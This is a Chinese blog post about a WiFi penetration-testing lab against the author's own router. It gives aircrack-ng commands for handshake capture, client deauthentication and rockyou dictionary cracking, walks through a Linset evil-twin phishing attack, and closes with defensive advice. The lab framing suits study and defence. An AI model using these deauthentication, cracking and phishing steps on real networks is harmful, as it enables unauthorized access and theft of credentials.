面向WiFi密码破解的渗透测试研究

面向WiFi密码破解的渗透测试研究

前言:

WiFi使用现状:目前现代化的社会,WiFi的普及率很高,但人们的防范意识还是相当薄弱,许多家庭和公司的WiFi密码设置都为了方便仍然会使用弱口令,或者选择隐藏WiFi再使用弱口令。

对此,笔者针对隐藏WiFi使用弱口令的情况做了暴力破解的渗透实验

另外,针对WiFi防范意识薄弱的情况做了WiFi钓鱼的渗透实验。

一、针对隐藏WiFi的弱口令密码爆破

使用系统:Kali Linux

使用工具:kali自带的aircrack-ng,RT3070L无线网卡

1、环境搭建

(1)路由器后台设置:

使用小米路由器搭建一个隐藏WiFi及设置弱口令密码。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HgmHb2JF-1647050596801)(img/4CE45711-773C-488a-8BFD-C20346A1E904.png)]

(2)攻击系统安装:

Kali Linux系统虚拟机安装方法此处省略。

(3)接入无线网卡:

打开Kali Linux系统,插入无线网卡,确认已连接虚拟机设备。

iwconfig   //查看当前网卡信息
出现wlan0等信息即表明网卡连接成功

2、WiFi探测

打开命令行终端,使用命令进行WiFi探测:

airmon-ng    //查看网卡信息

airmon-ng start wlan0   //开启WiFi监听模式

iwconfig  //查看本地网卡信息
可看到网卡已改名为wlan0mon,且处于监听模式

airodump-ng wlan0mon   //扫描WiFi列表
其中,BSSID是路由器mac地址,CH为信道,ESSID为WiFi名称。
在ESSID字段中,有三个显示的是<length: >样式的,其实就是隐藏WiFi后被扫描出来的结果。
此处附近的WiFi中出现了三个隐藏WiFi,可通过逐个选中BSSID来针对性扫描即可发现哪个是目标WiFi。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GRxC59Wn-1647050596802)(img/Snipaste_2022-01-21_11-29-56.png)]

airodump-ng -c 1 --bssid xx:xx:xx:xx:xx:xx -w /home/geek/Desktop/wifi/test wlan0mon
-c 指信道; --bssid 指bssid值; -w指握手包保存路径(test为握手包的名称)
//此时进入等待捕获握手包的窗口,右上角出现handshake字样即表示已捕获到抓手包。
//通过抓取握手包成功就发现了真正的ESSID值为WIFI-test。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-uElI0DPG-1647050596803)(img/Snipaste_2022-01-21_11-39-18.png)]

3、攻击WiFi用户掉线

保留原握手包获取窗口,另开一个命令行终端窗口,执行命令进行攻击WiFi用户掉线

aireplay-ng -0 10 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx wlan0mon   //攻击路线
-0 10 是指攻击10次(-0 0是指一直攻击无数次)  -a是指bssid值  -c是指连接WiFi的用户mac地址 

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6BSSqM1m-1647050596803)(img/Snipaste_2022-01-21_14-07-52.png)]

4、跑字典破解

等待握手包抓取成功后,可执行跑密码字典命令来破解WiFi密码。

由于该隐藏WiFi设置的是弱口令密码,因此这里使用kali自带的默认字典:

cd /usr/share/wordlists   //进入字典所在目录
ls  //可查看到有rockyou.txt.gz文件
sudo gunzip rockyou.txt.gz   //解压缩字典
ls   //可查看到解压后的字典文本
more rockyou.txt   //查看字典文本文件

跑字典破解过程:

aircrack-ng -w rockyou.txt /home/geek/Desktop/wifi/test-01.cap
//命令格式:aircrack-ng -w 密码字典文件路径 握手包保存路径

实验结果:隐藏WiFi的弱口令密码被秒破,密码为:123456789

二、WiFi钓鱼

使用系统:wifislax中文版

使用工具:wifislax自带的linset,RT3070L无线网卡

1、环境搭建

(1)路由器后台设置:

使用小米路由器搭建一个正常开放且设置相对复杂的密码的WiFi。

(2)攻击系统安装:

wifislax中文版虚拟机安装方法:

1、使用VMware Workstation工具,版本不限,这里使用的是12PRO,此软件安装方法省略。

2、–>点击创建新的虚拟机

–>选择典型

–>下一步

3、–>选择稍后安装操作系统

–>下一步

4、–>选择Linux

–>选择Ubuntu 64 位

–>下一步

5、–>输入自定义名称

–>选择保存系统文件的路径

–>下一步

6、–>根据自己需求,正常保持默认即可

–>选择将虚拟磁盘拆分成多个文件

–>下一步

7、–>点击完成

8、–>点击编辑虚拟机设置

9、–>修改内存大小为4GB

9、–>点击CD/DVD (SATA)

–>选择使用ISO映像文件

–>选择ISO文件路径

–>确定

10、–>开启虚拟机 等待运行开机即可。

(3)接入无线网卡

打开wifislax系统,插入无线网卡,确认已连接虚拟机设备。

iwconfig   //查看当前网卡信息
出现wlan0等信息即表明网卡连接成功

2、攻击过程

(1)打开Linset工具

点击左下角蓝色按钮,点击 >无线安全软件 >Wpa >Linset(Evil twin attack

(2)选择无线网卡

–>输入1

–>按回车键

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jzFz5rop-1647050596804)(img/Snipaste_2022-01-22_11-16-05.png)]

(3)扫描与确定目标WiFi

–>输入1

–>回车键

–>进入扫描列表,等待出现目标WiFi后,用鼠标左键点击一下这个窗口任意处。

–>按Ctrl + C

–>输入要攻击的WiFi的编号,如这里是输入45

–>按回车键

(4)选择攻击模式

–>输入1

–>按回车键

–>按回车键

–>输入1

–>按回车键

–>输入1

–>按回车键

(5)抓包过程

右上角弹出WiFi握手包捕获窗口,等待捕获到握手包,如窗口中右上角方出现[WPA handshake: ]

即表示已捕获到握手包。

抓包成功,此时可用鼠标点击该握手包捕获的窗口任意处,按Ctrl +C可停止捕获握手包。

如原窗口出现黑屏现象,可点击窗口任意处,按回车键。

(8)执行攻击

–>输入1

–>按回车键

–>输入1

–>按回车键

–>输入1

–>按回车键

3、攻击效果

进入攻击界面,生成四个窗口,等待用户输入正确WiFi密码。

【用户视角】

用户连接上钓鱼热点后跳转的认证界面:

用户输入错误密码提交后的界面:

用户输入正确密码提交后的界面;

【攻击界面视角】

当用户输入正确的密码提交后,成功获取到WiFi密码:TobeFish@6666

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5kl3IdH8-1647050596804)(img/Snipaste_2022-01-22_12-34-07.png)]

三、防范建议

主要防范的思路:

1、提高密码复杂度,包含数字,英文大小写,符号。

2、在路由器后台关闭广播来隐藏WiFi,确实对普通用户效果还行,但同时也要设置复杂密码。

3、提高安全防钓鱼意识,不要在认证页面随意输入WiFi密码。

  • 0
    点赞
  • 41
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值